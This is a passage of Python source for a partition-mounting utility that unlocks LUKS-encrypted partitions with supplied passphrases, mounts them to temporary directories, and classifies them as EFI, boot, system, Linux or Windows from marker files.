    def __init__(self, part: str, passphrases: Iterable[str] = (), no_luks: bool = False):
        """Mount a partition

        Args:
            part: Path to partition to mount
            passphrases: Passphrases to try if encountered an encrypted partition. Empty by default
            no_luks: Do not attempt to unlock an encrypted partition. Defaults to False.
    """
        self._part = part
        self._passphrases = passphrases
        self._no_luks = no_luks
        super().__init__('/definitely-doesnt-exist-and-also-shouldnt')

    def __enter__(self) -> 'MountedPartition':
        part = self._part
        luks_name = ""
        if not self._no_luks:
            is_luks_encrypted = luks_is_partition_encrypted(self._part)

            if is_luks_encrypted:
                tmp, tmp2 = handle_luks_partition(
                    self._part, self._passphrases)
                if tmp is None or tmp2 is None:
                    raise RuntimeError(
                        f"Failed to unlock partition '{self._part}'")
                luks_name, part = tmp, tmp2
        else:
            is_luks_encrypted = False
        mount_point = tempfile.mkdtemp()
        errorcode = programs.Mount().invoke_and_wait(None, part, mount_point)
        if errorcode != 0:
            common_utils.print_error(
                f"Failed to mount partition '{part}'! Skipping partition")
            if is_luks_encrypted:
                luks_close(luks_name)
            raise RuntimeError(
                f"Failed to mount partition '{part}'! Skipping partition")
        if is_luks_encrypted:
            self._luks_name = luks_name
            self._is_luks_encrypted = is_luks_encrypted
        self.mount_point = mount_point
        self._path_var_name = "mount_point"
        return self

    def __exit__(self, *_: Any) -> None:
        programs.Umount().invoke_and_wait(None, self.mount_point)
        if hasattr(self, "_is_luks_encrypted"):
            luks_close(self._luks_name)

    def partition_type(self) -> PartitionType:
        """Detect partition type

        Returns:
            Partition type flags
        """
        if self._flags is not None:
            return self._flags
        if self.isdir("EFI") and len(self.listdir("EFI")) != 0:
            self._flags = self.EFI_PARTITION | self.BOOT_PARTITION
            return self._flags
        flags = self.PartitionType.DATA_PARTITION
        if self.isdir("boot"):
            if self.isdir("boot/grub") or self.exists("boot/vmlinuz") or self.exists("boot/initrd.img"):
                flags |= self.BOOT_PARTITION
            # Probably just some random file named `boot` on some random partition
        if self.isdir("Windows/System32"):
            flags |= self.SYSTEM_PARTITION | self.WINDOWS_PARTITION
        elif self.exists("etc/os-release") or self.exists("etc/lsb-release") or self.exists("etc/shadow"):
            flags |= self.SYSTEM_PARTITION | self.LINUX_PARTITION
        self._flags = flags
        return self._flags

    def is_efi(self) -> bool:
        """Return whatever the current partition is EFI_PARTITION 

        Returns:
            Whatever current partition is EFI_PARTITION
        """
        return bool(self.partition_type() & self.EFI_PARTITION)

    def is_boot(self) -> bool:
        """Return whatever the current partition is BOOT_PARTITION 

        Returns:
            Whatever current partition is BOOT_PARTITION
        """
        return bool(self.partition_type() & self.BOOT_PARTITION)

    def is_system(self) -> bool:
        """Return whatever the current partition is SYSTEM_PARTITION 

        Returns:
            Whatever current partition is SYSTEM_PARTITION
        """
        return bool(self.partition_type() & self.SYSTEM_PARTITION)

    def is_data(self) -> bool:
        """Return whatever the current partition is DATA_PARTITION 

        Returns:
            Whatever current partition is DATA_PARTITION
        """
        return bool(self.partition_type() & self.DATA_PARTITION)

    def is_linux(self) -> bool:
        """Return whatever the current partition is LINUX_PARTITION 

        Returns:
            Whatever current partition is LINUX_PARTITION
        """
        return bool(self.partition_type() & self.LINUX_PARTITION)

    def is_windows(self) -> bool:
        """Return whatever the current partition is WINDOWS_PARTITION 

        Returns:
            Whatever current partition is WINDOWS_PARTITION
        """
        return bool(self.partition_type() & self.WINDOWS_PARTITION)


def mount_partition(part: str, passphrases: Iterable[str] = (), no_luks: bool = False) -> MountedPartition:
    """Mount a partition

    Args:
        part: Path to partition to mount
        passphrases: Passphrases to try if encountered an encrypted partition. Empty by default
        no_luks: Do not attempt to unlock an encrypted partition. Defaults to False.

    Returns:
        mounted partition
    """
    return MountedPartition(part, passphrases, no_luks)
